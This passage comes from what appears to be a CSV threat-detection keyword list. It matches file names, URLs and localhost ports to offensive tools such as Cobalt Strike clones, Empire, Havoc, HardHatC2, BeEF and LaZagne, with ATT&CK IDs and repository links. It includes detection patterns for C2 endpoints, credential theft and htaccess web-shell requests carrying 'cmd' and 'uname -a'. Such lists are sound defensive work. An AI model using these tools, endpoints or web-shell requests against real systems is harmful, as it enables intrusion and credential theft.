without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*html/scripts/merlin.js*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" +"*Html-Injection-Payloads.*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" +"*Html-Injection-Read-File-Payloads.*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" +"*HTMLSmuggler-main*","offensive_tool_keyword","HTMLSmuggler","HTML Smuggling generator&obfuscator for your Red Team operations","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/D00Movenok/HTMLSmuggler","1","1","N/A","10","1","97","13","2023-09-13T22:26:51Z","2023-07-02T08:10:59Z" +"*HTool*","signature_keyword","Antivirus Signature","AV signature for exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","hacktool signatures","N/A","N/A","N/A","N/A","N/A","N/A" +"*HTool/WCE*","signature_keyword","Antivirus Signature","Generic hacktool Engine signature","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*HTool-Lazagne*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*htrgouvea/nipe*","offensive_tool_keyword","nipe","An engine to make Tor Network your default gateway.","T1560 - T1573 - T1578","TA0005 - TA0007","N/A","N/A","Data Exfiltration","https://github.com/htrgouvea/nipe","1","1","N/A","N/A","10","1692","315","2023-09-22T12:35:29Z","2015-09-07T18:47:10Z" +"*htshells-master*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*http* | hakrawler -d *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*http*.sslip.io*","greyware_tool_keyword","sslip.io","sslip.io is a DNS server that maps specially-crafted DNS A records to IP addresses e.g. 127-0-0-1.sslip.io maps to 127.0.0.1","T1568.002 - T1048.003","TA0003 - TA0004","N/A","N/A","C2","https://github.com/cunnie/sslip.io","1","1","letigimate tool abused by threat actor to bypass IP blockage and encrypt traffic","6","10","464","64","2023-10-04T15:07:26Z","2015-08-26T18:43:35Z" +"*http*//127.0.0.1:5001*","greyware_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"*http*//localhost:5001*","greyware_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"*http*/127.0.0.1*:1337*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*http*/charlotte.dll*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" +"*http*/demon.dll","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*http*/demon.exe","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*http*/demos/butcher/index.html*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*http*/john/Test/raw/master/*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*http*/localhost*:1337*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*http*/zha0gongz1*","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","1","N/A","10","10","123","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" +"*http*://*/Terminator.sys","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","3","266","53","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" +"*http*://127.0.0.1:4433*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*http*://127.0.0.1:5556*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*http*://127.0.0.1:8081*","greyware_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*http*://localhost:4433*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*http*://localhost:5556*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*http*://localhost:8081*","greyware_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*http*:3000/hook.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*http*:3200/manjusaka*","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","664","132","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" +"*http*:801/bq1iFEP2*","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","664","132","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" +"*http*127.0.0.1:21802*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" +"*http*127.0.0.1:3030*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*http*127.0.0.1:5000*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" +"*http*127.0.0.1:50050*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*http*127.0.0.1:5096*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" +"*http*127.0.0.1:57230*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*http*127.0.0.1:7096*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" +"*http*127.0.0.1:8080/*.dll*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" +"*http*127.0.0.1:8080/*.exe*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" +"*http*127.0.0.1:8080/*.ps1*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" +"*http*127.0.0.1:9631*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" +"*http*localhost:21802*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" +"*http*localhost:3030*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*http*localhost:5000*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" +"*http*localhost:50050*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*http*localhost:5096*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" +"*http*localhost:57230*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*http*localhost:7096*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" +"*http*localhost:9631*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" +"*http.title:*BIG-IP®*- Redirect*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/aqhmal/CVE-2020-5902-Scanner","1","0","N/A","N/A","1","54","22","2022-12-08T11:03:15Z","2020-07-05T06:19:09Z" +"*HTTP/EXEGOL-01.*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*http://*/.htaccess?c=cmd*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*http://*/.htaccess?c=uname -a*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*http://*/FortyNorth/GetIt*","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","1","N/A","10","10","58","15","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z" +"*http://*/FortyNorth/PostIt*","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","1","N/A","10","10","58","15","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z" +"*http://*Microsoft.ActiveDirectory.Management.dll*","offensive_tool_keyword","powershell","redteam technique - import the ActiveDirectory module without the need to install it on the current computer - the dll has been extracted from a Windows 10 x64 with RSAT installed","T1110.001 - T1110.003 - T1110.004","TA0006","N/A","N/A","Credential Access","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/ActiveDirectory/Bruteforce.ps1","1","1","N/A","N/A","1","91","6","2023-10-01T14:24:00Z","2022-12-05T12:40:02Z" +"*http://10.10.13.37*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10",,"N/A",,, +"*http://127.0.0.1/CrossC2*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*http://127.0.0.1/FUZZ*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*http://127.0.0.1:3000/ui/panel*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*http://127.0.0.1:35000*","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","2","152","21","2023-07-05T13:24:44Z","2023-06-20T12:58:09Z" +"*http://127.0.0.1:443/aaaaaaaaa*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*http://127.0.0.1:443/bbbbbbbbb*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 